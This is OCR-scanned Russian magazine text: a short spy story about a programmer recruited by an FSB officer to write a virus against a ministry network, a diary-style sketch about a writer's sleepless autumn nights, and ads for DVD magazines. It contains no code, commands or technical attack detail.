— Послушайте, Корнеев, я не хочу сейчас углубляться в дебри 
психологии, но ваш портрет, созданный аналитиками, говорит о том, 
что вы просто ждете, когда к вам придет человек и предложит свести 
счеты со всеми, кто попадался на вашем пути! Разве это не соответ- 
ствует истине? 

Ткаченко в сердцах стукнул зонтом по скамейке. 

— Вот, к примеру... — он стремительно раскрыл тетрадь примерно 

на середине, ткнул пальцем и посмотрел, куда попал: 

— Замечательно! Ксения Сапожникова! Вашими усилиями — главный 
бухгалтер отделения «Агропромбанка», — Алексей Сергеевич не смо- 
трел на Корнеева, но чувствовал, что тот вспомнил фамилию. — Одно- 
классница, не так ли? 

— Да, — сжав губы, коротко ответил Корнеев. Сапожникова... Он пом- 
нил ее под девичьей фамилией Наливайко. Количество насмешек 

над ней в силы такой уязвимой фамилии в школе превышало все мы- 
слимые и немыслимые пределы; училась она из рук вон плохо, сооб- 
ражала в основном в тычинках и пестиках, таблица умножения была 
ей чужда в принципе, буквы в словах писались не то чтобы произволь- 
но, но явно с учетом ее желания... Зато она была красива до безумия. 
Уже в девятом классе у нее оформились все необходимые части тела; 
парни сходили по ней с ума, писали записки, дарили цветы, провожали 
до дома, таскали портфель, дрались... Пытался проявлять к ней вни- 
мание и «ботаник» Корнеев, но от него красавице Ксении было нужно 
только одно — домашнее задание. И он из кожи вон лез, чтобы заслу- 
жить хотя бы снисходительную улыбку. Решал задачи по физике, сво- 
дил концы с концами на алгебре, расставлял запятые в диктантах и пи- 
сал сочинения. 

В итоге она закончила школу без «троек». Он помогей даже на 
экзаменах — когда уже перестал надеяться на благосклонность с ее 
стороны. В итоге она прорвалась за приличные папины деньги на фа- 
культет, выпускающих управленцев, удачно вышла замуж и оказалась 
на верхушке финансового айсберга под названием «Агропром». Ви- 
тя помнил, как однажды к нему в гости пришел одноклассник, Костя 
Журкин, предложил навестить хоть кого-нибудь из класса; выбор пал 


на Сапожникову — поскольку про остальных на тот момент известно 
было крайне мало. 

Они с трудом пробились сквозь охрану — Ксения долго делала 
вид, что не узнает своих одноклассников, но потом все-таки попросила 
пропустить их. Они поднялись наверх, этаж на третий-четвертый, в ее 
кабинет; Ксения опустилась в роскошное кресло у окна, закинула ногу 
на ногу и превратилась в восковую куклу, символизирующую собой 
преуспевающую бизнес-леди. И Журкин возьми тогда и ляпни: 

— Ну, рассказывай, Ксюха, как ты докатилась до такой жизни! 

На что Сапожникова улыбнулась самым краешком губ, закурила 
тонкую и длинную сигарету и спросила томным голоском: 
— Костик, ты что, хочешь меня пожалеть? 

...Все это стремительно, в виде мозаики из лиц, пронеслось пе- 
ред глазами Корнеева. Он поймал себя на том, что стоит неподвижно 
и даже не моргая, погрузившись с головой в прошлое. 

— Нет, не Сапожникова! — быстро ответил он, не в силах избавиться 

от навязчивой картинки. Он так и запомнил ее — властной, красивой, 
чужой... — Чем вам Ксюха не угодила? 

— Я смотрю, процесс идет, — Ткаченко закрыл тетрадь. — Вы уже го- 
товы выбирать — если не Сапожникова, значит, кто-то другой? 

Корнеев почувствовал себя обманутым — наверняка Ткаченко 
подсунул ему Ксению специально, аналитики подсказали. Мол, надо 
ему сразу подставить школьную любовь — и он с вероятностью в сто 
процентов откажется, но тогда выберет кого-нибудь другого, чтоб 
только с ней ничего не случилось. 

Аналитики оказались правы. Несмотря на то, что выросла Са- 
пожникова выдающейся стервой, мстить ей он совсем не хотел. Где-то 
внутри сидела в нем та несбывшаяся мечта... И он уже был готов 
взять у Алексея Сергеевича тетрадь сам и ткнуть пальцем куда-нибудь 
мимо Ксении. 

— Они были правы... 

— Кто? 

— Ваши психологи, — Корнеев покачал головой. — Я действительно 
хочу отомстить. Хоть кому-нибудь. И все, что мне было нужно — 

это помощь такого человека как вы. Чтобы пришел и принес свою вол- 
шебную тетрадочку, позволил вспомнить прошлое, выбрать цель... 

Он снова подошел к скамейке и встал напротив Ткаченко. 

— Можно я сам? 

Он протянул руку к досье, но Алексей Сергеевич не дал забрать 

его. Он отрицательно покачал головой и прокомментировал: 

— Вам же ясно сказано, Корнеев — я не Мэри Поппинс, 

я дон Корлеоне. 

— Не понял... 

— Выбирать будете не вы, — пояснил Ткаченко ледяным голосом. — 
Все уже давно решено. Кому вы будете мстить и как. 

— То есть? — непонимающе спросил Витя. 

— Тоесть — существует некая цель. Чтобы подобраться к ней 

хотя бы чуть-чуть, ушли почти полтора года. И наше ведомство приш- 
ло квыводу, что теперь можно приступать ко второму этапу. Тут в дело 
вступите вы. 

— Почему я? 

— Потому что нам нужна компьютерная программа, — объяснил Тка- 
ченко. — Наша цель — человек. Точнее сказать, информация о его 
преступных намерениях и деяниях. В его окружение внедрен наш 
агент. Вы напишите вирус. Он внедрит этот вирус в сеть. Мы получим 
данные и сможем арестовать интересующую нас личность. Ну, авы 
реализуете свое чувство мести. Как вам такая схема? 

Корнеев молчал. Он смотрел на Ткаченко, переваривая услы- 
шанное. Как все оказалось просто — пришли, принесли на блюдце все 
твое прошлое и сказали: «Выбирай!». Правда, потом немного откор- 
ректировали, выбора не оказалось, но возможность отомстить остави- 
ли. И на том спасибо, низкий поклон. 

— Кто этот человек? — выдержав паузу, спросил он у Ткаченко. — От- 
куда след — из школы, из института? 

— Ваши одноклассники сумели забраться высоко в достаточно огра- 
ниченном количестве, — Алексей Сергеевич отрицательно покачал го- 
ловой. — Так высоко, как Сапожникова, оказались всего трое. Осталь- 
ные — хорошие середнячки с неплохим среднегодовым доходом. Поэ- 
тому, конечно же, то, что вы назвали «следом», тянется из института. 
Сергей Заволокин — помните такого? 

Виктор пожал плечами. 

— Заволокин? — переспросил он. — А он точно... Ну, учился со мной? 
— У меня все ходы записаны, — сурово покачал головой Ткаченко. — 
Как в случае с Остапом Бендером. Поэтому примите на веру, если по- 


чему-то не помните. Жаль, конечно, что он стерся из памяти — а ведь 
вы писали ему курсовую... 

— Да? — удивился Корнеев. — На какую тему? 

— Слишком длинное название, я не запомнил, — махнул рукой Алек- 
сей Сергеевич. — И только благодаря тому, что ее зачли, он не выле- 
тел из института. Правда, диплом ему так и не пригодился — отец при- 
строил его в одно министерство... Не здравоохранения и не образова- 
ния, будьте уверены. В более денежное место. И вот уже там он рас- 
цвел... А ведь в институте, не поверите, приторговывал наркотиками. 
— А этого разве мало? — спросил Корнеев. — Поставьте его перед 
фактом того, что это будет обнародовано... 

— Доказать невозможно, слишком давно было дело, да и не это от не- 
го нужно, — Ткаченко сразу отмел версию Виктора. — Давайте каж- 
дый будет заниматься своим делом — я ставить задачи, вы их выпол- 
нять. Итак — вы беретесь за работу? 

— Аесли я скажу «нет»? — тут же переспросил Витя. 

— Тогда вы не получите гонорар в размере одной тысячи американ- 
ских долларов, — развел руками Алексей Сергеевич. — Не выпендри- 
вайтесь, Корнеев, и не набивайте себе цену. Вас просчитали — 

и выводы оказались абсолютно точными. Вы — замечательное 
орудие для мести. 

— Мне нужны технические характеристики сети и ее топология, — ска- 
зал Корнеев вместо «да». — Ваш человек имеет физический доступ 

к компьютеру, на который планируется залить вирус? 

— Да. 

— Замечательно. Какой у меня срок? 

— Я даю вам неделю, Корнеев, — удовлетворенно кивнул Ткаченко. — 
Правда, сам я не уверен, что за это время можно написать качествен- 
ный вирус... 

— Можно, — перебил его Виктор. — Как я передам его вам? 

— Через неделю здесь же. В это же время. Вы мне диск — я вам день- 
ги. Вот то, что вам нужно, — он вытащил из портфеля папку. — Здесь 
документация системного администратора из министерства. Копии от- 
личного качества, на них гриф «секретно», что отметет все ваши мы- 
сли о розыгрыше и подставе. 

Он встал со скамейки — чувствовалось, что он чертовски устал 
сидеть на этом насесте, опираясь на зонтик. Портфель закрылся. Тка- 
ченко посмотрел на Корнеева и добавил: 

— Поверьте — вы сделаете очень нужное дело. А заодно и потешите 
свое самолюбие. Постарайтесь вспомнить Сергея Заволокина — 

и, возможно, работа пойдет быстрее. Месть — как и любовь — хоро- 
ший стимулятор. 

Корнеев кивнул, хотел было протянуть руку на прощание, но так 
и не осмелился — только слегка дернул кистью и замер, будто поймав 
ее на лету. Алексей Сергеевич сделал вид, что ничего не заметил. 

— Идите, юноша... А мне еще надо позвонить. Я хоть и не последний 
человек в своем ведомстве — но тоже подотчетен... 

Корнеев кивнул, прижал папку с планами к груди обеими руками 
и зашагал прочь. Ткаченко подождал, пока расстояние между ними 
станет достаточно большим, потом достал из кармана сотовый теле- 
фон, нажал несколько клавиш: 

— Здравствуй... Да, это я... Да, он все взял. Так, как и планирова- 
лось. Они молодцы, такую работу провернули. Да, скоро буду... Отчет 
завтра. Я установлю за ним наблюдение — пусть смотрят за каждым 
его шагом. Смотрят, слушают, делают все, чтобы не случилось ника- 
ких неожиданностей... Все получится. Через неделю. После чего у 
нас будет всего три дня — но думаю, что мы управимся быстрее. Все, 
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пока, увидимся... 
Он спрятал телефон в карман, посмотрел на небо и буркнул: 
— Дождя не будет, зря только зонт таскаю... 

Грохот трамвая заглушил его ворчание... 

Корнеев шагал по аллее парка к дому и думал, что таких совпа- 
дений не бывает. Вот еще несколько дней назад он окинул тоскливым 
взглядом свою жизнь, вспомнил тех, кто оставил след в его памяти и 
решил — ведь было бы неплохо встретиться хоть с кем-нибудь и на- 
помнить, чьими заслугами сумел этот кто-то подняться на свой жиз- 
ненный Олимп. И напомнить так, чтобы мало не показалось. 

Стоит, однако, признать, что без волшебной тетради Ткаченко он 
вряд ли сумел найти хоть кого-нибудь — пожалуй, за исключением все 
той же Сапожниковой. Ее-то он как раз видел достаточно часто — 
очень приметный джип Ксении время от времени мелькал на улицах 
города. Остальные же рассеялись по стране и миру и оказались вне 
пределов досягаемости — сей факт очень расстроил Корнеева, он по- 
грузился на пару дней в депрессию, чего с ним раньше не случалось — 
а когда пришел в себя, то оказалось, что времени даром он не терял... 

Та неделя, что ему дал Ткаченко для написания программы, бы- 
ла ему не нужна — Витя сваял за пару дней настоящую бомбу, вирус, с 
легкостью уклоняющийся от большинства антивирусных сканеров, су- 
ществующих в настоящее время. Удивлению Корнеева не было гра- 
ниц — он не ожидал от самого себя такого знания Ассемблера. Рань- 
ше он никогда не писал деструктивных программ — каждое его творе- 
ние обязано было приносить пользу. И тут — такое... 

Корнеев, закончив работу над вирусом, спал почти сутки. Мама 
старалась не будить его, тихо убравшись в комнате и с непониманием 
и уважением разглядывая какие-то закорючки на экране и множество 
исписанных листков с иностранными словами. Сын во сне вздрагивал, 
ворочался, пытаясь спасти мир от какого-то вселенского зла, перед 
его закрытыми глазами пробегали строчки кода, скручиваясь в беско- 
нечную спираль... Мама поправляла одеяло и выходила из комнаты — 
а он продолжал во сне изобретать, программировать, комбинировать; 
мозги не могли, не умели, и не хотели отдыхать... 

Проснулся он тогда резко, на вдохе — сердце бешено колоти- 
лось, что-то испугало его во сне. Он вскочил и сразу же увидел при- 
бранную комнату, аккуратно сложенные листы черновиков, нетрону- 
тый включенный компьютер, понял, где он, вспомнил все, чем зани- 
мался последние дни, вспомнил свой сон... 

Исправления тогда пришли на ум мгновенно — он, не одеваясь, 
прошлепал босыми ногами к компьютеру, плюхнулся в кресло, быстро 
просмотрел листочки, исписанные вдоль и поперек, потом запустил 
нужные программы, исправил ошибки, проверил работу вируса на 
виртуальной машине — и издал крик, похожий, по его мнению, на бое- 
вой клич индейцев. Когда мама ворвалась в комнату, напуганная этим 
воплем, он прыгал посреди комнаты в одних трусах, разбрасывая по 
углам свои черновики... 

Сегодня он пришел домой абсолютно спокойным и уверенным в 
себе. По дороге из парка он уже определил, по какому пути пойдет, 
чтобы улучшить свое творение в соответствии с требованиями Ткачен- 
ко. Надо было прикрутить к вирусу пару дополнительных модулей, ко- 
торые одновременно и расширят его функциональность, и еще надеж- 
нее скроют от чужих глаз. 

Присев за стол, он включил компьютер и разложил перед собой 
схему компьютерной сети. 
— Придется немного поколдовать, — сказал он сам себе. — Мам! — 
крикнул он. 
— Что, сын? — вошла она к нему в комнату и остановилась на пороге. 
— Ты уже вернулся? 
— Мам, я сегодня буду много работать, — он даже не обернулся. — Ты 
не могла бы мне приготовить... Ну, не знаю... Чтоб далеко ходить не 
надо было. Вот тут чтоб лежало, только руку протянуть. А? 

Мама пожала плечами. 
— Подумаю. Тебе когда подавать? 
— Да пока не надо — но чувствую, что через час-полтора уже проголо- 
даюсь по полной программе. Если я кое-что понимаю в этой жизни — 
мне наконец-то улыбнулась удача. Причем так улыбнуласы... 

Мама вздохнула и сказала: 

— Надеюсь, ничего противозаконного... 

Витя промолчал. Она понимающе кивнула и вышла на кухню. 

Работа закипела. Он писал код, подгонял его под условие зада- 
чи, представлял себя агентом, крадущимся по темным коридорам ми- 
нистерства, в котором служит Сергей Заволокин... Вот он проникает в 
кабинет, в центре которого стоит терминал администратора, на цы- 


почках подкрадывается к нему, рукой в черной перчатке достает из 
кармана диск, вставляет в привод... И вот уже его вирус начинает 
свою черную работу, собирает информацию, упаковывает ее и отсы- 
лает... А он выскальзывает из кабинета незамеченным. 

— «Миссия невыполнима», — удовлетворенно произнес Корнеев че- 
рез несколько часов, откатился от стола и осмотрелся. Рядом с ком- 
пьютером оказалась тарелка с оладьями, возле нее — плошка с варе- 
ньем. Кружка остывшего чая. 

Он даже не заметил, когда заходила мама. 

— Спасибо, ма! — крикнул он и принялся поглощать холодную, 
но очень своевременную еду. — Очень вкусно! 

Но минут через пять он замер с набитым ртом, остановив на пол- 
пути руку с кружкой. Мысль, которая осенила Корнеева, напрочь отби- 
ла аппетит. Он вдруг представил, что будет с тем агентом в случае 
провала... А ведь чтобы не вычислили, нужна простая, но очень нуж- 
ная вещь — нужная настолько, что он с трудом дожевал, с таким же 
трудом протолкнул комок в горло и запил ледяным чаем. 

Ноги толкнули кресло к компьютеру, пальцы легли на клавиату- 
ру. Он сделает это... Он поможет. Сергей Заволокин сядет в тюрьму — 
и никто не раскроет агента. 

— Наверное, он не зря дал мне неделю, — шепнул он себе под нос, 
глядя на экран. — Он чувствовал, что я смогу больше. И я — смогу... 


Ткаченко сидел на скамейке, словно и не уходил всю неделю. Виктор 
подошел осторожно, как можно тише — но застать врасплох опытного 
«безопасника» не смог. Тот резко обернулся на шорох листвы, уз- 

нал — и махнул рукой, приглашая присесть рядом. 

Корнеев подошел — уже не таясь, широко шагая, забрался на 
скамейку, сел, закинул ногу на ногу. Начинать разговор первым не хо- 
телось — тем более что ему было чем удивить Алексея Сергеевича. 

Пауза затянулась. Ткаченко смотрел за забор, на трамвайные 
пути, время от времени вздыхая; Корнеев этого молчания не понимал, 
начал нервничать и все-таки заговорил: 

— Почему вы ни о чем меня не спрашиваете? 

— Потому что на душе тоскливо, — не поворачивая головы, ответил 
Алексей Сергеевич. — Пакостно как-то, словно кошки нагадили... 

— Что так? — Корнеев попытался расшевелить Ткаченко — и это нес- 
мотря на то, что он его побаивался. Каждое утро в течение недели 

он просыпался с мыслью о том, что еще не пришло время встречаться 
с заказчиком — и от этого становилось спокойно, и он умудрялся за- 
дремать снова... 

— Почитал еще раз ваше досье... Знаете, если рассчитывать вероят- 
ности, то почти семьдесят процентов людей, которым вы помогли 

в этой жизни, стали позором нашей страны — и это несмотря на то, 
что в своем роде деятельности они преуспевают. И я жалею о том, что 
не в состоянии взять в руки автомат и расстрелять их всех на площа- 
ди — да еще с прямым эфиром по центральным каналам. 

Ткаченко повернулся к Корнееву, посмотрел в его глаза. 

— Вы хоть понимаете, сколько уродов получили путевку в жизнь бла- 
годаря вашему типу мышления? Да лучше иметь твердый шанкр, чем 
мягкие убеждения! И ведь вы такой не один... 

— Мне почему-то казалось, что обвинять стоит их, а не меня, — ото- 
двинулся от Ткаченко Витя. — Я не учил их быть теми, кем они стали. 
— Но вы участвовали в процессе естественного социального отбора, 
— прошипел Алексей Сергеевич. — И благодаря вам результаты были 
искажены! 

Корнеев замолчал, не в силах понять логику Ткаченко. Ему даже 
на какое-то время стало страшновато находиться рядом с ним, но уж 
очень хотелось получить гонорар. И он решил перевести разговор бли- 
же к делу. 

— Я выполнил ваше задание, — произнес он, будто и не было этого 
жутковатого вступления. — Вирус готов. Я принес диск. Вы должны 
были принести деньги. 

— Деньги... — покачал головой Алексей Сергеевич. — Всех волнуют 
только деньги... Вот и вы... А такой правильный, такой честный, та- 
кой... Ладно, давайте вашу программу. Вы не забыли принести назад 
планы сети? 

— Нет, все у меня с собой, — Корнеев вытащил из-за пазухи сложен- 
ные листы. — Я Tak понимаю, что раз это копии — то вам они потом 
все равно будут не нужны; поэтому виду них не очень... 

Ткаченко посмотрел на планы, заляпанные пятнами кофе, скру- 
TUN из них бумажный жгут, достал зажигалку, поджег и бросил за спи- 
ну. Корнеев поднял на мгновение брови: 


— Я мог бы и сам, надо было 
только сказать... 
— Такие вещи я должен ви- 
деть своими глазами, — про- 
бурчал Алексей Сергеевич. — 
Давайте диск. 

Витя протянул ему коро- 
бочку и поинтересовался: 
— Авы в этом сами хоть что- 
нибудь понимаете? То есть — 
кто оценит качество товара, 
кто проверит работоспособ- 
ность? 
— Понимаю, понимаю, — от- 
махнулся Ткаченко. — И люди 
найдутся. Так что обманывать 
не рекомендую. А то гонорар 
будет не в радость. Вот ваши 
деньги... 
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— Тысяча долларов, как и договаривались. Маму только не напугайте 
— еще решит, что вы убили кого-нибудь... 

Корнеев взял деньги и сказал: 
— Спасибо, конечно... Но там, на диске, есть еще кое-что. 
— Что? — замер собирающийся уже уйти Ткаченко. 
— Я вот подумал — а что будет, если агента вычислят? Как он сможет 
оправдаться? Как сможет доказать, что он не причастен к похищению 
данных? 
— Ну и Kak же? — в глазах у Ткаченко он увидел неподдельный инте- 
рес. 
— Только если сможет доказать, что никакого вируса нет. И не было. 
— Это как? — Алексей Сергеевич в этот момент выглядел человеком, 
которого пытаются одурачить на лохотроне. 
— На диске в отдельной папке лежит программа-нейтрализатор. 
В случае опасности агент сможет с любого компьютера в сети мини- 
стерства — где бы он не находился — запустить эту программу. И ни- 
кто и никогда не найдет вирус — исчезнет и он сам, и следы его дея- 
тельности. При исчезновении угрозы эта же программа вернет вирус 
к действию. Это я сам придумал. Для вас... 

Ткаченко смотрел на него, открыв рот. Корнеев был рад произве- 
денному эффекту. 

— Ну как? — спросил он, когда понял, что сам Алексей Сергеевич 
не произнесет ни слова. 

— И это действительно работает? — сумел выдавить тот из себя. 
— Да, я проверял. 

Ткаченко протянул руку Корнееву, в ответ тот пожал ее. 

— Спасибо вам, Виктор... От всей нашей службы... Спасибо... Вы... 
Я... Мне надо идти. Начальству докладывать. Да и вам пора. Не стоит 
нам тут затягивать сцену прощания. Счастливо. 

Корнеев развернулся и ушел. Ушел, унося в кармане куртки ты- 
сячу американских долларов и осознание того, что его силами одной 
сволочью на этой земле станет меньше. 

Ткаченко, как и в прошлый раз, проводил его взглядом, 

а потом достал телефон и набрал все тот же, что и неделю назад, 
телефонный номер: 

— Привет... Диск у меня... Нет, он тебя не вспомнил. Я уверен, 

что не вспомнил. Хотя в первые несколько секунд мне показалось, 
что догадается, но блеска в глазах не было. Он работал вслепую. И 
ты не поверишь, что он сделал... Этот рохля, этот «ботаник» хре- 
нов... Что? Ты там стоишь? Лучше сядь и слушай. Корнеев опять 
«прогнулся» — но на этот раз сам. Насколько в нем это прочно си- 
дит — он просто гениальная «шестерка»! Он написал вирус — и дал 
мне его вместе с нейтрализатором! Короче, объясняю — когда наш 
человек все сделает в министерстве, я дам тебе команду... Да, пра- 
вильно понял. Пропустишь минимум информации — чтобы было, 
над чем голову ломать... Да, а потом запустишь нейтрализатор. По- 
Han? Молодец, Сережа... Ты у меня всегда был понятливым. Так что 
давай, отца не подведи... 

Он спрятал телефон в карман и направился в контору — писать 
рапорт об удачно проведенной вербовке Корнеева и полученном от 
него вирусе. 

Все-таки внебрачный сын для полковника ФСБ — тяжелая 
ноша... © 
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...Был день, и в этот день мыщьх 
заглянул на самое дно своего оди- 
ночества, точнее, выглянул оттуда, 
высунулся из колодца, и на душе 
стало так хреново, что сразу же за- 
хотелось назад. А начиналось 
все так... 

...Ну сколько раз повторять — 
ненавижу я засыпать на рассвете, 
но пока мыщьх точил статью, ночь 
незаметно превратилась в утро, та- 
кое слякотное утро, с темным небом 
и мокрым снегом, с рассветом, от- 
весно падающим откуда-то сверху, 
сплошь затянутым серой пеленой 
облаков. Мыщьх, отложив статью 
по эвристикам, на минуту подошел 
к окну, за которым висели ярко- 
красные грозди калины. Открыл 
форточку, а затем и все окно цели- 
ком. Пахнуло приятной свежестью, 
разгоняющей запах нагретой пласт- 
массы и заставляющей мыщьха пое- 
живаться от набегающих волн легко- 
го осеннего ветерка. Покурил сле- 
гонца, впитывая в себя вместе с ды- 
мом красоту убегающего мира, уно- 
сящегося куда-то вдаль, словно жел- 
тая стрела. Точнее, стрелки. Наруч- 


ных часов. В количестве трех штук. 
От холода начало попускать, да и 
нужно было возвращаться к статье, 
дописать которую удалось только 

в десятом часу, догнавшись до 31 Кб 
вместо положенных 20. Явный пере- 
доз! Ладно, редакторы все равно по- 
режут... 

Измученный трудовыми будня- 
ми, мыщьх сидел на кухне и тянул 
чай, а за окном ветер трепал облака, 
сквозь разрывы которых просвечи- 
вало ослепительно яркое солнце. 
Дождь уже кончился, и по небу про- 
палывали конгломераты мрачных 
облаков с резкими границами... Ко- 
роче, когда мыщьх, глотая феназе- 
пам, пытался заснуть, утро уже бу- 
шевало во всю. И все утро мыщьх'у 
снились кошмары... 

...Проснулся после заката 
в кромешной тьме, материализовав- 
шей ночной кошмар в реальную мы- 
шу (не растаманскую), приехавшую 
всего на один день. Точнее, даже 
не на день, а всего на 12 часов. Что я 
ощутил? Давление. Дискомфорт. 
Рассеянность. Невозможность сос- 
редоточиться. Невозможность пи- 
сать, невозможность вертеть хвос- 
том. Все сразу стало не так, как вче- 
ра... На душе — мрак и темный оса- 
док... Провожая ее на автобус после 
бессонной ночи по утру, мыщьх возв- 
ращался в свою нору, двигаясь 
на встречу свободе по пустынной до- 
роге. А на горизонте прямо на глазах 
разгоралась неправдоподобно ог- 
ромная светящаяся рубиновая арка 
восходящего солнца (принятая 
по-началу за какую-то рекламу), 
но нет, это было не реклама. Солнеч- 
ный шар вздымался ввысь, сокраща- 
ясь в размерах, разгораясь все ярке 
и смещаясь в оранжевый спектр. 
Мыщьх шагал навстречу шару, 
что-то перевернувшему в его душе 
и впервые за много лет пронзившему 
давно забытым чувством всеобъем- 
лющего восторга от отрываемого 
лично твоего персонального малень- 
кого чуда. Того чуда, в котором ты 
видишь себя... Ради которого стоит 


жить, шевелить хвостом и идти 
к звездам через любые тернии, овра- 
ги и бурелом. А по оврагам мыщьх 
носился предостаточно. Едва успел 
достигнуть своей норы, как тут же 
скормил кэнону свежую пленку и со- 
вершил большой забег, снимая на 
автомате все, что только попадало 

в объектив. Игра света и теней меня- 
ла пейзаж на глазах, и времени на 
раздумье уже не оставалось, приш- 
лось забыть о творчестве, полностью 
отдавшись во власть автоматики. 
Вокруг норы оказалось столько инте- 
ресных листьев, деревьев и других 
вещей, недоступных мне ранее толь- 
ко потому, что я сидел в своей скор- 
лупе и никуда из нее не выходил. 

А тем временем вокруг разворачи- 
вался целый мир... 

...В вечерней темноте призыв- 
но светилась линейка индикаторов 
однокиловаттной упсы, оставленной 
чисто про запас, уступившей место 
своей двухкиловаттной преемнице, 
при включении которой на секунду 
вспыхнул красный глазок, и тут же 
привычно загудел вентилятор. Пош- 
ла загрузка систем на двух компью- 
терах стразу (третий сегодня отды- 
хал за ненадобностью). Начинался 
обычный трудовой мыщъхиный день, 
а точнее, ночь, за которую нужно 
постараться написать полторы 
статьи, тогда завтра еще полторы, 

и все будет просто очень-очень хоро- 
шо! А за окном — мрачная осень 

и последний букет дубков на столе. 
Серое небо, холодный ветер, каким- 
то образом пробравшийся даже 

в мою нору. Мрак в душе. Ну, это по 
зиме всегда так. Хотя зима еще не 
настала, ее дыхание витает в возду- 
хе словно призрак. Творческий по- 
рыв упирается в отсутствие времени. 
Мыщьх столько всего не сделал, что 
собирался сделать еще несколько 
лет назад. А что изменилось за эти 
годы? Ничего. Даже собственная 
уверенность ничуть не возросла. 
Мыщьх крутится в колесе и нарезает 
круги... Но для бешенного мыщьха 
сто верст — не круг! © 


Думаешь, что посмотреть сегодня вечером? 
Выбираем кино c TOTAL DVD! 


Все о кино - читай о блокбастерах месяца, размышляй о лентах 
вместе со звездами, выбирай на какой сеанс пойти 

© 

Все о DVD - самые лучшие релизы месяца, более 50 обзоров, море 
интервью 

® 

„и немного о технологиях будущего! Телевидение высокой 


четкости, плазмы и многое другое! 


Total DVD — ультимативный журнал для киноманов! 


Каждый журнал комплектуется О\/О-приложением с великолепным 
полнометражным фильмом категории «А» (качество изображения и звука на 
диске соответствует лучшим мировым релизам), подборкой трейлеров и анонсов 
новых картин и роликами к В\О-релизам. 
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Ищешь себе технику для домашнего кинотеатра? 
— самый лучший гид по аудио- 

видео- новинкам! 

Все о Hi-Fi, High End и Home Cinema! 


Пошаговые инструкции по составлению и инсталляции системы 
домашнего кино 


Лучшие системы и компоненты месяца - рай для новичков. Более 50 
самых новых моделей в оценочных и сравнительных тестах 


Готовые системы, интервью, самые свежие новости индустрии 
Всегда на лезвии прогресса! 


Выбираем домашний кинотеатр с журналом «DVD Эксперт»! 
(ейчасэто стильно, это модно, это доступно, это просто! 

Каждый журнал комплектуется О\О-приложением свеликолепным полнометражным 
фильмом категории «А» (качество изображения и звука на диске соответствует 
лучшим мировым релизам) и тестами для настройки системы хоум синема. 
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